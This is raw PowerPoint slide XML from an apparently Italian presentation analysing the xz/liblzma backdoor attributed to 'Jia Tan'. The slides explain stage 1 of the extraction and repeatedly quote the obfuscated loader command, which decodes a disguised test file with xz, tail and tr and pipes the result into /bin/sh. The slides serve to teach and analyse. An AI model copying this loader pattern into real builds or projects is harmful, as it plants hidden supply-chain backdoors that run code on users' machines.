                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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72220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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11864247" cy="280076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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decompressione di good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e invia su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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060912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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11864247" cy="243143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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prende l'output precedente e lo dà in input alla funzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manda l'output su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
